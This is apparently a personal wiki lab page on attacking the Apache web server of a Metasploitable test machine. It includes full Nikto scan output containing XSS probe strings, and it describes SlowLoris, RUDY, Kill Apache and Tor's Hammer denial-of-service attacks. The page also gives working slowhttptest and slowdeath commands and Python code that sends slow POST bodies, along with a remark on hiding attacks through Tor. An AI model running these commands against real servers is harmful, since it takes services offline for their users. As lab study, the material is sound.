From charlesreid1

Apache vulnerabilities by version: https://httpd.apache.org/security/vulnerabilities_22.html

Recon

Nikto

Nikto is a web server vulnerabilities scanner. It provides an excellent starting point for recon and for determining next steps. We'll use it to gather information about vulnerabilities in Metasploitable's web servers.

Basic usage of nikto: https://cirt.net/nikto2-docs/usage.html

# nikto -h 10.0.0.27

This reveals a number of web server vulnerabilities, both through Apache and through other things like PHP:

root@morpheus:~/codes/nikto# nikto -h 10.0.0.27
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.0.0.27
+ Target Hostname:    10.0.0.27
+ Target Port:        80
+ Start Time:         2016-03-27 13:07:26 (GMT-7)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) DAV/2
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.10
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ /phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script>: Output from the phpinfo() function was found.
+ OSVDB-3268: /doc/: Directory indexing found.
+ OSVDB-48: /doc/: The /doc/ directory is browsable. This may be /usr/doc.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpMyAdmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ Server leaks inodes via ETags, header found with file /phpMyAdmin/ChangeLog, inode: 92462, size: 40540, mtime: Tue Dec  9 09:24:00 2008
+ OSVDB-3092: /phpMyAdmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /test/: Directory indexing found.
+ OSVDB-3092: /test/: This might be interesting...
+ /phpinfo.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3268: /icons/: Directory indexing found.
+ /phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>: Output from the phpinfo() function was found.
+ /phpinfo.php?cx[]=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<script>alert(foo)</script>: Output from the phpinfo() function was found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpMyAdmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpMyAdmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 8329 requests: 0 error(s) and 29 item(s) reported on remote host
+ End Time:           2016-03-27 13:08:29 (GMT-7) (63 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

The following vulnerability identified by Nikos is exploited on the Metasploitable/Apache page:

+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php

Python Attacks

This page covers some techniques for abusing the Apache server on the Metasploitable machine using Python.

SlowLoris DoS Attack

SlowLoris that opens a (large) fixed number of connections to send a payload of a specified size, then proceeds to twiddle its thumbs.

Slowloris is basically an HTTP Denial of Service attack that affects threaded servers.

We start making lots of HTTP requests.

We send headers periodically (every ~15 seconds) to keep the connections open.

We never close the connection unless the server does so. If the server closes a connection, we create a new one keep doing the same thing.

This exhausts the servers thread pool and the server can't reply to other people.

This is the computer networking equivalent of when you go to the bank, and just before you get to the teller window, a little old lady with a giant sack of pennies says "I'd like to deposit $573 in pennies. 1... 2... 3... 4... 5..." Except, an army of old ladies showing up in front of every teller window.

Slow Death Script

https://github.com/evert/slowdeath

This is a Python script that implements the SlowLoris attack with a fixed number of threads opening connections with the web server. This will completely swamp, e.g., an Apache server on a single machine.

slowhttptest

See the section below about slowhttptest for a nicer frontend with more options. What is covered below is some simple and straightforward Python.

Before

Here's what you should see before the attack when you punch in the IP address of the Metasploitable machine:

SlowDeath PreAttack.png

(Note that here the machine is at 192.168.56.101 - a set up that corresponds to creating a host-only network adapter for the VirutalBox. That means we'll be creating a network and only virtual machines on the host computer will be able to see the network.)

Running

To use slowdeath:

# python slowdeath.py -t 200 http://192.168.56.101

This will open 200 simultaneous connections and send data very, very slowly over those 200 connections.

During/After

This swamps the server temporarily, and anyone visiting 192.168.56.101 in the browser will experience a denial of service:

SlowDeath DOS.png

This will continue to open new connections as existing connections die:

SlowDeath Reopen.png

Once the attack is killed, everything is back to normal.

Kill Apache DoS

In 2011 a vulnerability was released related to Apache. By sending requests with a specially crafted header, an attacker could swamp a web server's CPU and memory and crash it, leading to a denial of service. This vulnerability was released in 2011 (CVE-2011-3192).

There is a perl version of this code called killapache.pl here: http://www.hackersgarage.com/apache-killer-denial-of-service-flaw-in-apache-webserver.html

There is a Python version of this code here: https://github.com/MaYaSeVeN/KillApachePy

However, the version of Apache on Metasploitable (2.2.8) is too old to be vulnerable to this exploit.

R U Dead Yet (RUDY) Attack

(This attack relies on POST requests. This means the site you are attacking must have a form.)

Some background info on the RUDY attack: https://www.incapsula.com/ddos/attack-glossary/rudy-r-u-dead-yet.html

This type of DoS attack opens a few connections, and leaves them open for long periods of time. This will eventually exhaust the server's resources, although the slow speed of the attack means it "should" go undetected.

The attack starts by browsing the target website and finding forms. RUDY then sends very long POST requests, and sends the large payload one byte at a time. The server won't kill the connection.

This proof of concept code is in Python and uses BeautifulSoup to automatically search for forms: https://github.com/loganhasson/r-u-dead-yet

Tor's Hammer Slow Body Attack

Tor's Hammer (https://sourceforge.net/projects/torshammer/) is a tool that uses the slow body attack to swamp Apache servers and cause a denial of service. It does this by sending a POST request with a large declared content-length, then sending data one bit at a time.

    def _send_http_post(self, pause=10):
        global stop_now

        self.socks.send("POST / HTTP/1.1\r\n"
                        "Host: %s\r\n"
                        "User-Agent: %s\r\n"
                        "Connection: keep-alive\r\n"
                        "Keep-Alive: 900\r\n"
                        "Content-Length: 10000\r\n"
                        "Content-Type: application/x-www-form-urlencoded\r\n\r\n" %
                        (self.host, random.choice(useragents)))

Notice that big Content-Length field.

Tor's Hammer then sends a little it of data across the connection, then sleeps for a random amount of time:

        for i in range(0, 9999):
            if stop_now:
                self.running = False
                break
            p = random.choice(string.letters+string.digits)
            print term.BOL+term.UP+term.CLEAR_EOL+"Posting: %s" % p+term.NORMAL
            self.socks.send(p)
            time.sleep(random.uniform(0.1, 3))

        self.socks.close()

Tor's Hammer, in particular, provides a Python script that enables running the slow body attack through a web proxy like Tor, to provide anonymity. It also implements other disguising elements like a slew of User Agent headers.

See Metasploitable/TorsHammer

Command-Line Utility Attacks

slowhttptest

This one's pretty straightforward. Download and install slowhttptest:

# apt-get install slowhttptest

This comes bundled with multiple utilities for multiple types of DoS attacks:

  • Slow POST mode (sends unfinished HTTP message bodies)
  • SlowLoris mode (sends unfinished HTTP requests)
  • Range header mode (tests the killapache vulnerability, mentioned above, which Metasploitable is not vulnerable to)
  • Slow Read mode (reads HTTP responses slowly)

SlowLoris DoS Attack

To use the SlowLoris denial of service attack and open a bunch of idle connections with a web server, use the -H flag.

# slowhttptest -H -u http://10.0.0.27

The -u flag specifies the URL of the target. However, we'll want to spice it up a bit more - specify a thousand connections -c 1000, and a few other parameters -i 10 for interval between two tests, -r 200 for 200 connections per second, -t GET to make these requests GET requests (keep it simple).

The -x 24 flag sets a cap on the amount of data sent, chunk-by-chunk, to the web server. -p 3 marks the server as DoS'ed if it doesn't respond after 3 seconds.

# slowhttptest -H -c 1000 -H -i 10 -r 200 -t GET -x 24 -p 3 -u http://10.0.0.27

This strangles the web server. Here's what it looks like when the Metasploitable machine is under attack:

SlowLoris UnderAttack.png

and here's what it looks like once the attack has been stopped:

SlowLoris Relief.png

Slow POST Attack

Not sure how this attack works without a form on the page being attacked, but somehow, it works.

To run the slow body attack, use the -B flag, and specify the URL target:

# slowhttptest -B -u http://10.0.0.27

Pictured below is a screenshot of the attack being run from two different machines, against the target at 10.0.0.27. With two machines attacking a single web server, there's no hope for 10.0.0.27.

Rudy UnderAttack.png

Flags